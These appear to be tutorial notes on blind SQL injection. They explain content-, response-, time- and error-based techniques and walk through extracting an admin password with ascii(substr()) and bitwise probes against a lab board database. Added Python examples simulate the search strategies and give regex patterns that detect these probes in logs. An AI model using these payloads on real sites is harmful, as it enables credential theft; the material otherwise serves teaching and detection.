Blind Injection -2


1. When the website does not display its own error page

2. When the result comes back as a server response rather than a database response

3. When an ORDER BY clause cannot be used

 

Blind attack methods

Content Blind (reference string)

Response Blind (response message)

 

Blind search techniques

Sequential search

Binary search

Bitwise search

 

Blind attack

The key is to decide true or false from the two kinds of response the server gives.

Content Based: when the board itself returns data from which true/false can be told apart

e.g.) searching with the reference string "test":

True : the rows containing "test" are displayed

False : nothing at all is displayed

 

Response Based

Decided by looking at the size of the server's response

True : "The post does not exist"

False : page error notice

 

Time Based

When true/false cannot be told apart in any other way,

and there is no response value at all, the network traffic (the delay) is used to force a true/false distinction

True : "The post does not exist"

False : the result is displayed after a delay of about 5~10 seconds

One of the most time-consuming attack techniques

 

Search methods

Sequential search

1~10, a~z, A~Z ... including special characters

Substitute the candidates one at a time to complete the search

 

Binary search

 0 1 2 3 4 5 6 7 8 9

a b c d e f g h i j k l m n o p q r s t u v w x y z

A B C D E F G H I J K L M N O P Q R S T U V W X Y Z

! @ # $ % ^ & * ( ) - _ = + ' ~ [ ] { } < > ? / \ |

 

ASCII code

ASCII code values 33 through 126 are assigned

Starting at 80 would mean starting from the middle, but usually you start from 97 (a)

 

In the 'members' table of the 'board' database,

is the 'ASCII code' of the 'first' character of the 'password' column where 'id' is 'admin' 'greater' than '80' ?

If the admin password is @dmin:

SELECT ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))>80

1. SELECT password FROM board.members WHERE id='admin' > @dmin

2. substr(@dmin,1,1) ==> @

3. ascii('@') ==> 64

4. 64>80

5. False

SELECT ascii('a')		# converts a character to its number
SELECT char('97')		# converts a number to a character

 

New data has been added to the members table.

Extract the added member's information using Content Blind.

If the guessed ASCII value of id is right, the page shows "1 match"
If the guessed ASCII value of id is wrong, the page shows "0 match"

ascii(substr((SELECT id FROM board.members WHERE idx=6),1,1))=108
ascii(substr((SELECT id FROM board.members WHERE idx=6),2,1))=101
ascii(substr((SELECT id FROM board.members WHERE idx=6),3,1))=101
ascii(substr((SELECT id FROM board.members WHERE idx=6),4,1))=106
ascii(substr((SELECT id FROM board.members WHERE idx=6),5,1))=105
ascii(substr((SELECT id FROM board.members WHERE idx=6),6,1))=101
ascii(substr((SELECT id FROM board.members WHERE idx=6),7,1))=117
ascii(substr((SELECT id FROM board.members WHERE idx=6),8,1))=110

ascii(substr((SELECT password FROM board.members WHERE idx=6),1,1))=103

 

 

0x21 => 33    0010 0001

> ASCII codes are always 7 bits

0x7e => 126   0111 1110

 

ascii('d') = 100 = 110 0100

AND the first bit with 1 : is the result 1 ?

AND the second bit with 1 : is the result 1 ?

AND the third bit with 1 : is the result 1 ?

AND the fourth bit with 1 : is the result 1 ?

AND the fifth bit with 1 : is the result 1 ?

AND the sixth bit with 1 : is the result 1 ?

AND the seventh bit with 1 : is the result 1 ?

 

110 0110

xxx xxx0
     & 1
----------------- AND
       0

xxx xx1x
    & 10
----------------- AND
       1

xxx x1xx
   & 100
----------------- AND
       1

 

In the 'members' table of the 'board' database, take the ASCII code of the first character of the 'password' column where 'id' is 'admin':

after a bitwise AND with 1, is it equal to 1 ?

SELECT ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&1=1

Working out each bit position

0100 0000 & 0000 0010 == 1?

ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&1=1	# False : 0

0100 0000 & 0000 0100 == 1?

0100 0000 & 0000 1000 == 1?

ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&2=2	# False : 0
ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&4=4	# False : 0
ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&8=8	# False : 0
ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&16=16	# False : 0
ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&32=32	# False : 0
ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&64=64	# True : 1

0100 0000 > @

Encode it with Ctrl+U, then check the result

Finding the 'admin' password

110 0100 >> converted to decimal : 100

SELECT char(100) : d

 

Let's find gugucon's password

1. Find the length of the password

We learn that the password is 5 characters long.
011 1001 > first character of gugucon's password
011 1001 ( 57 ) > 9
011 1001 > second character of gugucon's password
011 1001 ( 57 ) > 9
110 0011 > third character of gugucon's password
110 0011 ( 99 ) > c
011 0000 > fourth character of gugucon's password
011 0000 ( 48 ) > 0
110 1110 > fifth character of gugucon's password
110 1110 ( 110 ) > n
Password extracted successfully
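To see what the search-method section and the bitwise walkthrough above cost in practice, here is an added example (not from the original post) that runs the three strategies, sequential, binary and bitwise, against a local true/false oracle standing in for the "1 match / 0 match" page; the secret value and the Oracle class are constructed for the demo.

```python
# Added example, not from the original post: the three search strategies the
# post describes (sequential, binary, bitwise) run against a local true/false
# oracle that stands in for the "1 match / 0 match" page. SECRET is constructed.
SECRET = "99c0n"   # constructed value with the same shape as the post's example

class Oracle:
    # answers one yes/no question per call and counts how many were asked
    def __init__(self, secret: str):
        self._secret = secret
        self.questions = 0

    def length_is(self, n: int) -> bool:
        self.questions += 1
        return len(self._secret) == n

    def ask(self, pos: int, predicate) -> bool:
        # pos is 1-based like substr(...,pos,1); predicate sees the ASCII code
        self.questions += 1
        return predicate(ord(self._secret[pos - 1]))

def sequential(o: Oracle, pos: int) -> int:
    # try every printable code 33..126 in turn until "= code" answers true
    for code in range(33, 127):
        if o.ask(pos, lambda c: c == code):
            return code
    raise ValueError("character is not printable ASCII")

def binary(o: Oracle, pos: int) -> int:
    lo, hi = 33, 126                        # printable range from the post
    while lo < hi:
        mid = (lo + hi) // 2
        if o.ask(pos, lambda c: c > mid):   # the post's "> 80" style question
            lo = mid + 1
        else:
            hi = mid
    return lo

def bitwise(o: Oracle, pos: int) -> int:
    # seven questions "(ascii & 2**k) = 2**k ?", one per bit of a 7-bit code.
    # MySQL binds & tighter than =, Python binds == tighter than &: parenthesise.
    code = 0
    for k in range(7):
        if o.ask(pos, lambda c: (c & (1 << k)) == (1 << k)):
            code |= 1 << k
    return code

def extract(strategy) -> tuple[str, int]:
    # recover SECRET with one strategy; returns (value, questions asked)
    o = Oracle(SECRET)
    n = next(i for i in range(1, 65) if o.length_is(i))
    return "".join(chr(strategy(o, p)) for p in range(1, n + 1)), o.questions
```

For the five-character sample, sequential search needs 216 questions while binary and bitwise each need 40 (5 for the length plus 7 per character), which is also why a defender counting near-identical requests per session sees bursts in multiples of seven.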

 

 

Response Blind Based

>> the size of the server's response

400 // 200 // 500

404 : not found

200 : OK

501 : GATEWAY - server error

 

Works by using a CASE WHEN expression == an if statement

if(condition){ true }

else{ false }

 

CASE WHEN condition THEN true ELSE false END

SELECT CASE WHEN 1=1 THEN (SELECT 1) ELSE (SELECT 2) END;

SELECT CASE WHEN 1=1 THEN (SELECT 'TRUE') ELSE (SELECT 'FALSE') END;

What makes Response-based trickier than the other blind methods:

the statement must contain no syntax error at all

 

Submitting an SQL query to the DBMS

When the SQL statement "SELECT * FROM table" is entered:

1. The DBMS parses it > are there grammar errors ? , do the data types match ?

2. Compile

3. Execute > [error]

Multiple-row query error

Division by zero

SELECT CASE WHEN 1=1 THEN 'TRUE' ELSE(SELECT 'a' UNION SELECT 'b') END;

SELECT CASE WHEN 1=1 THEN 'TRUE' ELSE(SELECT 1/0) END;		# TRUE
SELECT CASE WHEN 1=2 THEN 'TRUE' ELSE(SELECT 1/0) END;		# FALSE

'and 1=(CASE WHEN 1=1 THEN 1 ELSE (SELECT 'a' union SELECT 'b') END)#	TRUE
'and 1=(CASE WHEN 1=2 THEN 1 ELSE (SELECT 'a' union SELECT 'b') END)#	FALSE

Left side ( true ) // right side ( failure )
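From the defender's side, the probes on this page have recognisable shapes once the request is URL-decoded. The following added example (not from the original post) flags them in web access log lines; the log lines are constructed for the demo and the pattern names are my own.

```python
# Added example, not from the original post: flag the blind-injection shapes the
# post shows (ascii(substr()) comparisons, "& N = N" bit probes, CASE WHEN error
# probes) inside web access log lines. The log lines are constructed for the demo.
import re
from urllib.parse import unquote_plus

# Query parameters arrive URL-encoded (the post's Ctrl+U step), so decode first.
PATTERNS = {
    "ascii_substr_compare": re.compile(r"ascii\s*\(\s*substr\s*\(.*?\)\s*[<>=&]", re.I | re.S),
    "bitwise_probe": re.compile(r"\)\s*&\s*(\d+)\s*=\s*\1\b"),
    "case_when_error_probe": re.compile(
        r"case\s+when\b.*?\belse\s*\(\s*select\s+(1\s*/\s*0|'[^']*'\s+union\s+select)", re.I | re.S),
}

LOG_LINES = [  # constructed sample lines: ip - - [time] "METHOD path HTTP/1.1" status bytes
    '10.0.0.5 - - [01/Jul/2022:10:00:01 +0900] "GET /board/search.php?q=test HTTP/1.1" 200 1523',
    '10.0.0.9 - - [01/Jul/2022:10:00:02 +0900] "GET /board/search.php?q=test%27+and+ascii%28substr%28%28SELECT+password+FROM+board.members+WHERE+id%3D%27admin%27%29%2C1%2C1%29%29%3E80%23 HTTP/1.1" 200 1523',
    '10.0.0.9 - - [01/Jul/2022:10:00:03 +0900] "GET /board/search.php?q=test%27+and+ascii%28substr%28%28SELECT+password+FROM+board.members+WHERE+id%3D%27admin%27%29%2C1%2C1%29%29%2664%3D64%23 HTTP/1.1" 200 1523',
    '10.0.0.9 - - [01/Jul/2022:10:00:04 +0900] "GET /board/view.php?idx=6%27+and+1%3D%28CASE+WHEN+1%3D1+THEN+1+ELSE+%28SELECT+1%2F0%29+END%29%23 HTTP/1.1" 500 310',
]

def request_target(line: str) -> str:
    # pull the path out of the quoted "METHOD path HTTP/x" field and URL-decode it
    m = re.search(r'"[A-Z]+\s+(\S+)\s+HTTP/', line)
    return unquote_plus(m.group(1)) if m else ""

def classify(line: str) -> list[str]:
    # names of the post's probe shapes found in the decoded request
    decoded = request_target(line)
    return [name for name, rx in PATTERNS.items() if rx.search(decoded)]

def scan(lines) -> dict[int, list[str]]:
    # 1-based line number -> triggered pattern names, for lines that trigger any
    hits = {}
    for i, line in enumerate(lines, 1):
        tags = classify(line)
        if tags:
            hits[i] = tags
    return hits
```

The decode step matters: the same probes sent with Ctrl+U encoding would slip past a matcher that looks at the raw log text.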

 
